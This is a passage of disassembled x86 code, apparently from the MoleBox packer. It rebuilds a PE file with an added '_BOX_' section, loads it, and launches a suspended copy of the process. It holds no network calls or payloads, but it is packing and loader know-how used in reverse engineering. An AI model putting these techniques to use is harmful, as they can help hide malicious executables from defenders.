mov eax, [ebp+var_4C]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_4C]
lea eax, [ecx+eax+18h]
sub eax, [ebp+var_4C]
mov ecx, [ebp+var_50]
mov ecx, [ecx+3Ch]
add ecx, eax
mov [ebp+var_70], ecx
mov eax, [ebp+var_4C]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_70]
add ecx, eax
mov [ebp+var_68], ecx
mov [ebp+var_34], 600h
push [ebp+var_34]
call sub_49935A
pop ecx
mov [ebp+var_FC], eax
mov eax, [ebp+var_FC]
mov [ebp+var_1C], eax
mov ecx, [ebp+var_34]
xor eax, eax
mov edi, [ebp+var_1C]
mov edx, ecx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
push 200h
call sub_49935A
pop ecx
mov [ebp+var_100], eax
mov eax, [ebp+var_100]
mov [ebp+var_54], eax
mov ecx, 80h
mov eax, 90909090h
mov edi, [ebp+var_54]
rep stosd
push 0
push 0
push 0
push [ebp+var_3C]
call sub_491421
lea eax, [ebp+var_64]
push eax
push 0
push 0
push [ebp+var_68]
push [ebp+var_1C]
push [ebp+var_3C]
call sub_492177
test eax, eax
jz short loc_4975EA
cmp [ebp+var_64], 0
jnz short loc_4975F4
loc_4975EA: ; CODE XREF: sub_4971E1+401�j
mov ecx, 0EF00000Fh
call sub_499342
loc_4975F4: ; CODE XREF: sub_4971E1+407�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_1C]
add ecx, [eax+3Ch]
mov [ebp+var_A0], ecx
mov eax, [ebp+var_A0]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_A0]
lea eax, [ecx+eax+18h]
mov [ebp+var_90], eax
mov eax, [ebp+var_A0]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_90]
add ecx, eax
mov [ebp+var_8C], ecx
mov eax, [ebp+var_A0]
add eax, 88h
mov [ebp+var_98], eax
mov eax, [ebp+var_A0]
add eax, 80h
mov [ebp+var_88], eax
mov eax, [ebp+var_A0]
and dword ptr [eax+24h], 0
mov eax, [ebp+var_A0]
and dword ptr [eax+20h], 0
mov eax, [ebp+var_A0]
and dword ptr [eax+1Ch], 0
mov eax, [ebp+var_54]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+0A0h]
mov [eax+34h], ecx
mov eax, [ebp+var_54]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+0A4h]
mov [eax+38h], ecx
mov eax, [ebp+var_A0]
cmp dword ptr [eax+84h], 0
jz short loc_4976BF
mov eax, [ebp+var_54]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+80h]
mov [eax+3Ch], ecx
jmp short loc_4976C6
; ---------------------------------------------------------------------------
loc_4976BF: ; CODE XREF: sub_4971E1+4C8�j
mov eax, [ebp+var_54]
and dword ptr [eax+3Ch], 0
loc_4976C6: ; CODE XREF: sub_4971E1+4DC�j
mov eax, [ebp+var_54]
add eax, 40h
mov [ebp+var_94], eax
mov eax, [ebp+var_94]
and dword ptr [eax], 0
mov eax, [ebp+var_54]
add eax, 44h
mov [ebp+var_9C], eax
jmp short loc_4976F8
; ---------------------------------------------------------------------------
loc_4976E9: ; CODE XREF: sub_4971E1:loc_497C30�j
mov eax, [ebp+var_90]
add eax, 28h
mov [ebp+var_90], eax
loc_4976F8: ; CODE XREF: sub_4971E1+506�j
mov eax, [ebp+var_90]
cmp eax, [ebp+var_8C]
jnb loc_497C35
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_90]
mov ecx, [ecx+14h]
mov [eax], ecx
mov eax, [ebp+var_9C]
add eax, 4
mov [ebp+var_9C], eax
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_90]
mov ecx, [ecx+10h]
mov [eax], ecx
mov eax, [ebp+var_9C]
add eax, 4
mov [ebp+var_9C], eax
mov eax, [ebp+var_9C]
mov ecx, [ebp+var_90]
mov ecx, [ecx+24h]
mov [eax], ecx
mov eax, [ebp+var_9C]
add eax, 4
mov [ebp+var_9C], eax
cmp ds:dword_4A2680, 2
jnb loc_49786E
mov eax, [ebp+var_90]
mov ecx, [ebp+var_98]
mov eax, [eax+0Ch]
cmp eax, [ecx]
ja loc_49786E
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_90]
add eax, [ecx+10h]
mov ecx, [ebp+var_98]
cmp eax, [ecx]
jbe loc_49786E
push 200h
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
call sub_496AE5
pop ecx
pop ecx
mov [ebp+var_30], eax
push [ebp+var_30]
call sub_49935A
pop ecx
mov [ebp+var_104], eax
mov eax, [ebp+var_104]
mov [ebp+var_2C], eax
mov eax, [ebp+var_A0]
push dword ptr [eax+38h]
mov eax, [ebp+var_90]
push dword ptr [eax+8]
call sub_496AE5
pop ecx
pop ecx
mov ecx, [ebp+var_A0]
mov ecx, [ecx+20h]
add ecx, eax
mov eax, [ebp+var_A0]
mov [eax+20h], ecx
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+14h]
push [ebp+var_3C]
call sub_491421
lea eax, [ebp+var_64]
push eax
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
push [ebp+var_2C]
push [ebp+var_3C]
call sub_492177
test eax, eax
jz short loc_497846
cmp [ebp+var_64], 0
jnz short loc_497850
loc_497846: ; CODE XREF: sub_4971E1+65D�j
mov ecx, 0EF00000Fh
call sub_499342
loc_497850: ; CODE XREF: sub_4971E1+663�j
mov eax, [ebp+var_90]
mov ecx, [ebp+var_34]
mov [eax+14h], ecx
mov eax, [ebp+var_90]
mov dword ptr [eax+24h], 0C0000040h
jmp loc_497C30
; ---------------------------------------------------------------------------
loc_49786E: ; CODE XREF: sub_4971E1+590�j
; sub_4971E1+5A7�j ...
mov eax, [ebp+var_90]
mov ecx, [ebp+var_88]
mov eax, [eax+0Ch]
cmp eax, [ecx]
ja loc_497B8F
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_90]
add eax, [ecx+10h]
mov ecx, [ebp+var_88]
cmp eax, [ecx]
jbe loc_497B8F
and [ebp+var_A8], 0
mov [ebp+var_4], 1
push 4
push 1000h
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
push 0
call ds:dword_4A27A4 ; VirtualAlloc
mov [ebp+var_A8], eax
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+14h]
push [ebp+var_3C]
call sub_491421
lea eax, [ebp+var_64]
push eax
push 0
push 0
mov eax, [ebp+var_90]
push dword ptr [eax+10h]
push [ebp+var_A8]
push [ebp+var_3C]
call sub_492177
test eax, eax
jz short loc_49790F
cmp [ebp+var_64], 0
jnz short loc_497919
loc_49790F: ; CODE XREF: sub_4971E1+726�j
mov ecx, 0EF00000Fh
call sub_499342
loc_497919: ; CODE XREF: sub_4971E1+72C�j
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
mov [ebp+var_B0], eax
mov eax, [ebp+var_88]
mov eax, [eax]
sub eax, [ebp+var_B0]
mov ecx, [ebp+var_A8]
add ecx, eax
mov [ebp+var_AC], ecx
and [ebp+var_B4], 0
jmp short loc_49795A
; ---------------------------------------------------------------------------
loc_49794D: ; CODE XREF: sub_4971E1:loc_497B5A�j
mov eax, [ebp+var_B4]
inc eax
mov [ebp+var_B4], eax
loc_49795A: ; CODE XREF: sub_4971E1+76A�j
mov eax, [ebp+var_88]
mov eax, [eax+4]
xor edx, edx
push 14h
pop ecx
div ecx
cmp [ebp+var_B4], eax
jnb loc_497B5F
mov eax, [ebp+var_B4]
imul eax, 14h
mov ecx, [ebp+var_AC]
cmp dword ptr [ecx+eax+0Ch], 0
jnz short loc_497991
jmp loc_497B5F
; ---------------------------------------------------------------------------
loc_497991: ; CODE XREF: sub_4971E1+7A9�j
mov eax, [ebp+var_B4]
imul eax, 14h
mov ecx, [ebp+var_AC]
mov edx, [ebp+var_A8]
add edx, [ecx+eax+0Ch]
sub edx, [ebp+var_B0]
mov [ebp+var_BC], edx
mov eax, [ebp+var_90]
mov ecx, [ebp+var_A8]
add ecx, [eax+10h]
cmp [ebp+var_BC], ecx
jbe short loc_4979D2
jmp loc_497B5F
; ---------------------------------------------------------------------------
loc_4979D2: ; CODE XREF: sub_4971E1+7EA�j
mov eax, [ebp+var_BC]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_4979E4
jmp loc_497B5F
; ---------------------------------------------------------------------------
loc_4979E4: ; CODE XREF: sub_4971E1+7FC�j
and ds:dword_4A2968, 0
and [ebp+var_B8], 0
push [ebp+var_BC]
call sub_49BE83
mov [ebp+var_B8], eax
cmp [ebp+var_B8], 0
jnz loc_497B27
cmp ds:dword_4A2968, 0
jz short loc_497A1E
jmp loc_497B29
; ---------------------------------------------------------------------------
loc_497A1E: ; CODE XREF: sub_4971E1+836�j
mov edi, [ebp+var_BC]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
push ecx
push [ebp+var_24]
call sub_49A2CA
pop ecx
pop ecx
mov [ebp+var_C0], eax
mov [ebp+var_4], 2
push 5Ch
push [ebp+var_C0]
call sub_48D700
pop ecx
pop ecx
mov [ebp+var_C4], eax
cmp [ebp+var_C4], 0
jz short loc_497A72
mov eax, [ebp+var_C4]
inc eax
mov [ebp+var_C4], eax
jmp short loc_497A7E
; ---------------------------------------------------------------------------
loc_497A72: ; CODE XREF: sub_4971E1+880�j
mov eax, [ebp+var_C0]
mov [ebp+var_C4], eax
loc_497A7E: ; CODE XREF: sub_4971E1+88F�j
mov edi, [ebp+var_BC]
mov edx, [ebp+var_C4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push [ebp+var_C0]
call sub_49BE83
mov [ebp+var_B8], eax
cmp [ebp+var_B8], 0
jnz short loc_497B00
cmp ds:dword_4A2968, 0
jz short loc_497AD9
push 1
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
jmp short loc_497B29
; ---------------------------------------------------------------------------
loc_497AD9: ; CODE XREF: sub_4971E1+8E7�j
push 7Eh
call ds:dword_4A278C ; RtlRestoreLastWin32Error
push 0FFFFFFFFh
and [ebp+var_140], 0
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_140]
jmp loc_498132
; ---------------------------------------------------------------------------
loc_497B00: ; CODE XREF: sub_4971E1+8DE�j
mov [ebp+var_4], 1
call sub_497B0E
jmp short loc_497B27
sub_4971E1 endp
; =============== S U B R O U T I N E =======================================
sub_497B0E proc near ; CODE XREF: sub_4971E1+926�p
; DATA XREF: _5:0049F4E0�o
mov eax, [ebp-0C0h]
mov [ebp-108h], eax
push dword ptr [ebp-108h]
call sub_4993DD
pop ecx
retn
sub_497B0E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4971E1
loc_497B27: ; CODE XREF: sub_4971E1+829�j
; sub_4971E1+92B�j
jmp short loc_497B2D
; ---------------------------------------------------------------------------
loc_497B29: ; CODE XREF: sub_4971E1+838�j
; sub_4971E1+8F6�j
mov [ebp+var_5C], 1
loc_497B2D: ; CODE XREF: sub_4971E1:loc_497B27�j
cmp [ebp+var_B8], 0
jz short loc_497B5A
mov eax, [ebp+var_94]
push dword ptr [eax]
push [ebp+var_B8]
push [ebp+var_BC]
call sub_4966EB
add esp, 0Ch
mov ecx, [ebp+var_94]
mov [ecx], eax
loc_497B5A: ; CODE XREF: sub_4971E1+953�j
jmp loc_49794D
; ---------------------------------------------------------------------------
loc_497B5F: ; CODE XREF: sub_4971E1+78F�j
; sub_4971E1+7AB�j ...
push 8000h
push 0
push [ebp+var_A8]
call ds:dword_4A27A8 ; VirtualFree
and [ebp+var_A8], 0
and [ebp+var_4], 0
jmp short loc_497B8F
; END OF FUNCTION CHUNK FOR sub_4971E1
; =============== S U B R O U T I N E =======================================
sub_497B7F proc near ; DATA XREF: _5:0049F4D0�o
push dword ptr [ebp-14h]
call sub_499C27
retn
sub_497B7F endp
; =============== S U B R O U T I N E =======================================
sub_497B88 proc near ; DATA XREF: _5:0049F4D4�o
mov esp, [ebp-18h]
and dword ptr [ebp-4], 0
sub_497B88 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4971E1
loc_497B8F: ; CODE XREF: sub_4971E1+69E�j
; sub_4971E1+6BE�j ...
mov eax, [ebp+var_90]
mov ecx, [ebp+var_90]
mov eax, [eax+8]
cmp eax, [ecx+10h]
jbe short loc_497BB4
mov eax, [ebp+var_90]
mov eax, [eax+8]
mov [ebp+var_144], eax
jmp short loc_497BC3
; ---------------------------------------------------------------------------
loc_497BB4: ; CODE XREF: sub_4971E1+9C0�j
mov eax, [ebp+var_90]
mov eax, [eax+10h]
mov [ebp+var_144], eax
loc_497BC3: ; CODE XREF: sub_4971E1+9D1�j
mov eax, [ebp+var_A0]
push dword ptr [eax+38h]
push [ebp+var_144]
call sub_496AE5
pop ecx
pop ecx
mov ecx, [ebp+var_90]
mov [ecx+8], eax
mov eax, [ebp+var_A0]
push dword ptr [eax+38h]
mov eax, [ebp+var_90]
push dword ptr [eax+8]
call sub_496AE5
pop ecx
pop ecx
mov ecx, [ebp+var_A0]
mov ecx, [ecx+24h]
add ecx, eax
mov eax, [ebp+var_A0]
mov [eax+24h], ecx
mov eax, [ebp+var_90]
and dword ptr [eax+10h], 0
mov eax, [ebp+var_90]
and dword ptr [eax+14h], 0
mov eax, [ebp+var_90]
mov dword ptr [eax+24h], 0E0000080h
loc_497C30: ; CODE XREF: sub_4971E1+688�j
jmp loc_4976E9
; ---------------------------------------------------------------------------
loc_497C35: ; CODE XREF: sub_4971E1+523�j
and [ebp+var_A4], 0
jmp short loc_497C4B
; ---------------------------------------------------------------------------
loc_497C3E: ; CODE XREF: sub_4971E1+A7C�j
; sub_4971E1+A87�j ...
mov eax, [ebp+var_A4]
inc eax
mov [ebp+var_A4], eax
loc_497C4B: ; CODE XREF: sub_4971E1+A5B�j
cmp [ebp+var_A4], 10h
jnb short loc_497C8E
cmp [ebp+var_A4], 0
jnz short loc_497C5F
jmp short loc_497C3E
; ---------------------------------------------------------------------------
loc_497C5F: ; CODE XREF: sub_4971E1+A7A�j
cmp [ebp+var_A4], 2
jnz short loc_497C6A
jmp short loc_497C3E
; ---------------------------------------------------------------------------
loc_497C6A: ; CODE XREF: sub_4971E1+A85�j
mov eax, [ebp+var_A4]
mov ecx, [ebp+var_A0]
and dword ptr [ecx+eax*8+7Ch], 0
mov eax, [ebp+var_A4]
mov ecx, [ebp+var_A0]
and dword ptr [ecx+eax*8+78h], 0
jmp short loc_497C3E
; ---------------------------------------------------------------------------
loc_497C8E: ; CODE XREF: sub_4971E1+A71�j
push 0Ah
pop ecx
xor eax, eax
mov edi, [ebp+var_90]
rep stosd
mov eax, [ebp+var_34]
add eax, [ebp+var_30]
mov ecx, [ebp+var_90]
mov [ecx+14h], eax
mov eax, [ebp+var_90]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+50h]
mov [eax+0Ch], ecx
mov esi, offset a_box_ ; "_BOX_"
mov edi, [ebp+var_90]
movsd
movsw
mov eax, [ebp+var_90]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+38h]
mov [eax+8], ecx
mov eax, [ebp+var_90]
mov dword ptr [eax+10h], 200h
mov eax, [ebp+var_90]
mov dword ptr [eax+24h], 0E0000020h
mov eax, [ebp+var_A0]
mov dword ptr [eax+3Ch], 200h
mov eax, [ebp+var_A0]
mov eax, [eax+50h]
mov ecx, [ebp+var_A0]
add eax, [ecx+38h]
mov ecx, [ebp+var_A0]
mov [ecx+50h], eax
mov eax, [ebp+var_A0]
mov eax, [eax+1Ch]
mov ecx, [ebp+var_A0]
add eax, [ecx+3Ch]
mov ecx, [ebp+var_A0]
mov [ecx+1Ch], eax
mov eax, [ebp+var_A0]
mov eax, [eax+28h]
mov [ebp+var_20], eax
push 5
pop ecx
mov esi, offset loc_4A1C70
mov edi, [ebp+var_54]
rep movsd
movsw
movsb
mov eax, [ebp+var_54]
inc eax
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov ecx, [ebp+var_A0]
mov ecx, [ecx+28h]
mov [eax+1], ecx
call sub_4968A0
mov ecx, [ebp+var_C8]
mov ecx, [ecx+1]
xor ecx, eax
mov eax, [ebp+var_C8]
mov [eax+1], ecx
mov eax, [ebp+var_C8]
add eax, 5
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov ecx, [ebp+var_24]
mov [eax+1], ecx
mov eax, [ebp+var_C8]
add eax, 5
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov ecx, [ebp+var_3C]
mov [eax+1], ecx
mov eax, [ebp+var_C8]
add eax, 5
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
inc eax
mov [ebp+var_C8], eax
mov eax, [ebp+var_C8]
mov dword ptr [eax+1], offset sub_496BD7
and [ebp+var_C8], 0
xor eax, eax
mov edi, [ebp+var_54]
add edi, 20h
stosd
stosd
stosd
mov eax, [ebp+var_54]
mov dword ptr [eax+24h], 8
mov eax, [ebp+var_A0]
mov dword ptr [eax+0A4h], 8
mov eax, [ebp+var_90]
mov eax, [eax+0Ch]
add eax, 20h
mov ecx, [ebp+var_A0]
mov [ecx+0A0h], eax
mov eax, [ebp+var_A0]
mov ecx, [ebp+var_90]
mov ecx, [ecx+0Ch]
mov [eax+28h], ecx
mov eax, [ebp+var_A0]
mov ax, [eax+6]
add ax, 1
mov ecx, [ebp+var_A0]
mov [ecx+6], ax
mov eax, [ebp+var_A0]
and dword ptr [eax+58h], 0
push 0
push 0
push 2
push 0
push 0
push 40000000h
push [ebp+var_28]
call ds:dword_4A26A8 ; CreateFileA
mov [ebp+var_58], eax
cmp [ebp+var_58], 0FFFFFFFFh
jnz short loc_497E8C
mov ecx, 0EF000011h
call sub_499342
loc_497E8C: ; CODE XREF: sub_4971E1+C9F�j
push 0
lea eax, [ebp+var_CC]
push eax
push [ebp+var_34]
push [ebp+var_1C]
push [ebp+var_58]
call ds:dword_4A27BC ; WriteFile
cmp [ebp+var_2C], 0
jz short loc_497EC2
push 0
lea eax, [ebp+var_CC]
push eax
push [ebp+var_30]
push [ebp+var_2C]
push [ebp+var_58]
call ds:dword_4A27BC ; WriteFile
loc_497EC2: ; CODE XREF: sub_4971E1+CC7�j
push 0
lea eax, [ebp+var_CC]
push eax
push 200h
push [ebp+var_54]
push [ebp+var_58]
call ds:dword_4A27BC ; WriteFile
push [ebp+var_58]
call ds:dword_4A26D8 ; FlushFileBuffers
push [ebp+var_58]
call ds:dword_4A26A4 ; CloseHandle
mov ds:dword_4A2958, 1
push [ebp+var_28]
call ds:dword_4A275C ; LoadLibraryA
mov [ebp+var_D0], eax
cmp [ebp+var_D0], 0
jnz short loc_497F2B
push 351h
push offset aDProjectsMy_sr ; "D:\\Projects\\My.SRC\\MoleStudio\\MoleBox\\m"...
call sub_4997CA
pop ecx
pop ecx
mov ecx, 0EF000010h
call sub_499342
loc_497F2B: ; CODE XREF: sub_4971E1+D2D�j
movzx eax, [ebp+var_5C]
test eax, eax
jz loc_49805C
mov eax, [ebp+var_D0]
mov [ebp+var_DC], eax
mov eax, [ebp+var_DC]
mov ecx, [ebp+var_DC]
add ecx, [eax+3Ch]
mov [ebp+var_EC], ecx
mov eax, [ebp+var_EC]
movzx eax, word ptr [eax+14h]
mov ecx, [ebp+var_EC]
lea eax, [ecx+eax+18h]
mov [ebp+var_E8], eax
mov eax, [ebp+var_EC]
movzx eax, word ptr [eax+6]
imul eax, 28h
mov ecx, [ebp+var_E8]
lea eax, [ecx+eax-28h]
mov [ebp+var_E0], eax
mov eax, [ebp+var_E0]
mov eax, [eax+0Ch]
mov ecx, [ebp+var_DC]
mov eax, [ecx+eax+3Ch]
mov [ebp+var_E4], eax
mov eax, [ebp+var_DC]
add eax, [ebp+var_E4]
mov [ebp+var_D8], eax
push 5Ch
push [ebp+var_24]
call sub_48D700
pop ecx
pop ecx
mov [ebp+var_D4], eax
cmp [ebp+var_D4], 0
jnz short loc_497FE0
mov eax, [ebp+var_24]
mov [ebp+var_D4], eax
jmp short loc_497FED
; ---------------------------------------------------------------------------
loc_497FE0: ; CODE XREF: sub_4971E1+DF2�j
mov eax, [ebp+var_D4]
inc eax
mov [ebp+var_D4], eax
loc_497FED: ; CODE XREF: sub_4971E1+DFD�j
push 14h
call sub_49935A
pop ecx
mov [ebp+var_10C], eax
mov eax, [ebp+var_10C]
mov [ebp+var_F0], eax
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_D4]
mov [eax], ecx
mov eax, [ebp+var_F0]
mov ecx, ds:dword_4A296C
mov [eax+10h], ecx
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_EC]
mov [eax+0Ch], ecx
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_D8]
mov [eax+4], ecx
mov eax, [ebp+var_F0]
mov ecx, [ebp+var_DC]
mov [eax+8], ecx
mov eax, [ebp+var_F0]
mov ds:dword_4A296C, eax
loc_49805C: ; CODE XREF: sub_4971E1+D50�j
call sub_49714D
push 0FFFFFFFFh
mov eax, [ebp+var_D0]
mov [ebp+var_148], eax
lea eax, [ebp+var_10]
push eax
call sub_48D496
pop ecx
pop ecx
mov eax, [ebp+var_148]
jmp loc_498132
; END OF FUNCTION CHUNK FOR sub_4971E1
; =============== S U B R O U T I N E =======================================
sub_498085 proc near ; DATA XREF: _5:0049F4C8�o
cmp ds:dword_4A2964, 0
jz short loc_498096
mov eax, [ebp-44h]
mov ds:dword_4A2964, eax
loc_498096: ; CODE XREF: sub_498085+7�j
cmp dword ptr [ebp-3Ch], 0FFFFFFFFh
jz short loc_4980A6
push 0
push dword ptr [ebp-3Ch]
call sub_491741
loc_4980A6: ; CODE XREF: sub_498085+15�j
mov eax, [ebp-50h]
mov [ebp-110h], eax
push dword ptr [ebp-110h]
call sub_4993DD
pop ecx
mov eax, [ebp-4Ch]
mov [ebp-114h], eax
push dword ptr [ebp-114h]
call sub_4993DD
pop ecx
mov eax, [ebp-1Ch]
mov [ebp-118h], eax
push dword ptr [ebp-118h]
call sub_4993DD
pop ecx
mov eax, [ebp-2Ch]
mov [ebp-11Ch], eax
push dword ptr [ebp-11Ch]
call sub_4993DD
pop ecx
mov eax, [ebp-54h]
mov [ebp-120h], eax
push dword ptr [ebp-120h]
call sub_4993DD
pop ecx
mov eax, [ebp-28h]
mov [ebp-124h], eax
push dword ptr [ebp-124h]
call sub_4993DD
pop ecx
push offset dword_4A2930
call ds:dword_4A2754 ; RtlLeaveCriticalSection
retn
sub_498085 endp
; ---------------------------------------------------------------------------
xor eax, eax
; START OF FUNCTION CHUNK FOR sub_4971E1
loc_498132: ; CODE XREF: sub_4971E1+C3�j
; sub_4971E1+145�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; END OF FUNCTION CHUNK FOR sub_4971E1
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_498141 proc near ; CODE XREF: sub_49BA24+15�p
; sub_49BA5E+43�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
push [ebp+arg_0]
mov ecx, ds:dword_4A294C
call sub_49C871
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_4981BD
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_8]
jbe short loc_498199
mov ecx, [ebp+var_8]
inc ecx
mov esi, [ebp+var_4]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+var_8]
mov [eax], ecx
jmp short loc_4981B8
; ---------------------------------------------------------------------------
loc_498199: ; CODE XREF: sub_498141+34�j
mov ecx, [ebp+arg_8]
mov esi, [ebp+var_4]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov eax, [ebp+arg_C]
mov ecx, [ebp+arg_8]
mov [eax], ecx
loc_4981B8: ; CODE XREF: sub_498141+56�j
push 1
pop eax
jmp short loc_4981BF
; ---------------------------------------------------------------------------
loc_4981BD: ; CODE XREF: sub_498141+1C�j
xor eax, eax
loc_4981BF: ; CODE XREF: sub_498141+7A�j
pop edi
pop esi
leave
retn
sub_498141 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4981C3 proc near ; CODE XREF: sub_49B0C8+42�p
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = byte ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49F4E8
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 80h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_78], 0
and [ebp+var_74], 0
and [ebp+var_70], 0
xor eax, eax
lea edi, [ebp+var_6C]
stosd
and [ebp+var_60], 0
push 10h
pop ecx
xor eax, eax
lea edi, [ebp+var_5C]
rep stosd
call ds:dword_4A26E4 ; GetCurrentProcess
mov [ebp+var_68], eax
mov [ebp+var_64], offset dword_48E720
and [ebp+var_1C], 0
cmp ds:dword_4A2958, 0
jz loc_498324
and [ebp+var_4], 0
push 105h
call sub_49935A
pop ecx
mov [ebp+var_8C], eax
mov eax, [ebp+var_8C]
mov [ebp+var_78], eax
push 50h
call sub_49935A
pop ecx
mov [ebp+var_90], eax
mov eax, [ebp+var_90]
mov [ebp+var_74], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_78]
rep stosd
stosb
push 104h
push [ebp+var_78]
push 0
call ds:dword_4A2718 ; GetModuleHandleA
push eax
call ds:dword_4A2714 ; GetModuleFileNameA
mov [ebp+var_60], 44h
lea eax, [ebp+var_88]
push eax
lea eax, [ebp+var_60]
push eax
push 0
push 0
push 4
push 1
push 0
push 0
push 0
push [ebp+var_78]
call ds:dword_4A26B8 ; CreateProcessA
test eax, eax
jnz short loc_4982BD
mov ecx, 0EF000015h
call sub_499342
loc_4982BD: ; CODE XREF: sub_4981C3+EE�j
call ds:dword_4A26E8 ; GetCurrentProcessId
push eax
push [ebp+var_88]
call sub_498494
pop ecx
pop ecx
push [ebp+var_84]
call ds:dword_49F024 ; ResumeThread
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_498324
; ---------------------------------------------------------------------------
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_94], eax
cmp [ebp+var_94], 0EF000015h
jnz short loc_498308
mov [ebp+var_98], 1
jmp short loc_498316
; ---------------------------------------------------------------------------
loc_498308: ; CODE XREF: sub_4981C3+137�j
push [ebp+var_14]
call sub_499C27
mov [ebp+var_98], eax
loc_498316: ; CODE XREF: sub_4981C3+143�j
mov eax, [ebp+var_98]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
loc_498324: ; CODE XREF: sub_4981C3+66�j
; sub_4981C3+11E�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4981C3 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_498333 proc near ; CODE XREF: sub_498482+B�p
; DATA XREF: sub_498482+6�o ...
var_24C = byte ptr -24Ch
var_220 = byte ptr -220h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_103 = byte ptr -103h
push ebp
mov ebp, esp
sub esp, 24Ch
push edi
and [ebp+var_108], 0
push ds:dword_4A2920
push 0
push 1F0FFFh
call ds:dword_4A2994
mov ds:dword_4A2948, eax
cmp ds:dword_4A2948, 0
jz short loc_4983A4
loc_498365: ; CODE XREF: sub_498333+63�j
lea eax, [ebp+var_108]
push eax
push ds:dword_4A2948
call ds:dword_4A2988
test eax, eax
jz short loc_498398
cmp [ebp+var_108], 103h
jnz short loc_498398
push 0FFFFFFFFh
push ds:dword_4A2948
call ds:dword_4A298C
jmp short loc_498365
; ---------------------------------------------------------------------------
loc_498398: ; CODE XREF: sub_498333+47�j
; sub_498333+53�j
push ds:dword_4A2948
call ds:dword_4A299C
loc_4983A4: ; CODE XREF: sub_498333+30�j
or [ebp+var_10C], 0FFFFFFFFh
and [ebp+var_104], 0
push 40h
pop ecx
xor eax, eax
lea edi, [ebp+var_103]
rep stosd
stosw
stosb
lea eax, [ebp+var_104]
push eax
push 104h
call ds:dword_4A2970
lea eax, [ebp+var_104]
push eax
call ds:dword_4A2974
lea eax, [ebp+var_104]
push eax
push 104h
call ds:dword_4A2978
push 64h
call ds:dword_4A2998
loc_4983FB: ; CODE XREF: sub_498333+124�j
lea eax, [ebp+var_24C]
push eax
push offset dword_4A29A0
call ds:dword_4A297C
